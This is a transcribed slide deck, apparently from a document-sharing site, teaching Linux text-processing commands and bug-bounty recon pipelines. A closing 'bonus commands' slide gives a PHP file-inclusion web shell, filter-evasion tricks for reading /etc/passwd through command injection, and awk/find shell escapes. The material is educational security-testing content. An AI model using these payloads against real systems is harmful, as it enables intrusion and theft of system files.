By Swapnil Security Testing Utilities For Commands And Linux

2y ago
112 Views
2 Downloads
485.06 KB
21 Pages
Last View : 9d ago
Last Download : 3m ago
Upload by : Jamie Paz
Transcription

Linuxcommands andutilities forsecurity testingBy Swapnil

Catcat - concatenate filesand print on the standardoutput

Cat Usage Display Contents of a Filecat test1.txt Redirect Contents of a Filecat test1.txt test3.txt To display content of all txt filescat *.txt To display the contents of a file with line numbercat -n file1.txt

FindFind command basicallyfinds the things for you

find Usage Find files in a directoryfind / Specific files in a directoryfind -name ‘*.jpg’ ”OR”find ( -iname 'jpeg' -o -iname 'jpg' )Find world-readble filesfind -perm -o r

parallelParallel is a shellutility for executing jobsin parallel

parallel Usage From serial to parallelfind . -name "*jpeg" parallel -I% --max-args 1 convert % %.png Multiple Inputsls -l parallel --max-args 2 echo

cut is a command-lineutility that allows you toCutcut parts of lines fromspecified files or pipeddata and print the resultto standard

CUT Usage Specify a fieldCut -f BytesCut -b Characters listCut -c DelimiterCut -d

sortSort sorts its input

sort Usage Numeric sortSort -n Human sortSort -h Uniq valuesSort -u

awkAwkis a general-purposescripting languagedesigned for advanced textprocessing.

awk Usage AWK patternsAwk ‘{print 3}’ test.txt Awk regexAwk ‘/reg/ {print 4}’ test.txt AWK field separatorAwk ‘BEGIN {FS “.”}{ print 1}’ test.txt

Echoecho is one of the mostcommonly and widely usedbuilt-in command for Linuxbash and C shells, thattypically used inscripting language andbatch files to display aline of text/string onstandard output or a file.

ECHo Usage Display a line of text on standard outputEcho Hello world Pattern matching charactersecho The PHP files are: *.php Redirect to a fileecho -e 'The test file' /tmp/file.txt Displaying output of a commandecho "The date is: (date %D)"

Some more command Reverse commandrev Grep commandGrep -r SED - edit the input streamSed -n 1-4p DelimiterCut -d

Lets make cocktail ofabove commands

Processing data for Recon Get javascript files from domains listCat domains list gau grep “.js” Get v1 api enpoints from URL listprintf yahoo.com gau grep -w "v1" head -10 Find URL with admin keyword in itCat domains.txt grep “admin” With staus code 200cat domains.txt gau hakcheckurl grep -w '200' head -10 Extract subdomains from outputgau -subs example.com cut -d / -f 3 sort -u

Pull Root Subdomains from Final.txtcat final rev cut -d . -f 1-3 rev sort -u tee root.subdomains Extract URLs from junk datacat file grep -Eo "(http https)://[a-zA-Z0-9./? -]*"*

Some bonus commands Command injection to File inclusionecho " ?php include( GET['page']) ? " rfi.php Command Injection bypassCat /etc/passwdCat /e”t”c/pass”w”dCat /etc/pass*d Echo and revEcho “dwssap/cte/ tac” rev AWK and shellawk 'BEGIN {system("/bin/sh")}' Find and AWKfind / -name blahblah -exec /bin/awk 'BEGIN {system("/bin/sh")}' \; Echo and teeecho "evil script code" tee script.sh

Thank you

By Swapnil. Cat cat - concatenate files and print on the standard output. Cat Usage Display Contents of a File cat test1.txt Redirect Contents of a File cat test1.txt test3.txt To display content of all txt files ca

Related Documents:

Oracle Utilities Work and Asset Management 22 Oracle Utilities Mobile Workforce Management 24 Oracle Utilities Other Sessions (ODM, Opower, Etc.) 26 Oracle Utilities Technical Sessions 28 . 4 2017 ORACLE UTILITIES EDGE CUSTOMER

Oracle Utilities Testing Accelerator comprises test automation accelerators for the automated testing of Oracle Utilities applications. It is a framework based on Java and Selenium for creating the web services and user interface automation scripts. Oracle Utilities Testing Accelerator enables you to create the automation scripts using keywords or

Application Security Testing (DAST) Origin Analysis / Software Composition Analysis (SCA) Mobile Application Security Testing (MAST) Application Security Testing as a Service (ASTaaS) Correlation Tools Application Security Testing Orchestration (ASTO) Database Security Scanning Test Coverage Analyzers Interactive Application Security Testing .

Irene Li1, Alexander Fabbri1, Swapnil Hingmire2 and Dragomir Radev1 1LILY Lab, Yale University, USA 2Tata Consultancy Services Limited (TCS), India COLING'2020. Motivation With the increasing amount of information available online, there is

CA Swapnil Pa 5 tni Buy Books & PD From www.swapnilpatni.com d) Corrective 28. In an expert system, the process of matching a question to the information in the knowledge base is called: a) Deduction. b) inferencing. c) inclusion. d) None of the above. 29. Decision makers who are co

Swapnil Patni’s Classes 020 - 24466 748 90118 51796 94216 68233 Swapnil Patni’s Classes 90118 54340 90118 51233 020 - 24466 748 90118 51796 94216 68233 www.swapnilpatni.com26.1 90118 54340 90118 51233 26.1 INTRODUCTION 1. The Insolvency and Bankruptcy Code, 2016

Swapnil Nimse Project – 1 Challenge #2 Project Overview: Using Ansys-Fluent, analyze dependency of the steady-state temperature at different parts of the system on the flow velocity at the inlet and buoyancy-driven ther

Andreas Wagner, CEO Berlin Office Schiffbauerdamm 19, D-10117 Berlin Phone: 49-30-27595-141 Fax: 49-30-27595142 berlin@offshore-stiftung.de Varel Office Oldenburger Str. 65, D-26316 Varel Phone: 49-4451-9515-161 Fax: 49-4451-9515-249 varel@offshore-stiftung.de www.offshore-stiftung.de More news & information (German/English) 16 Backup Slides German Offshore Windfarms under Construction 2 .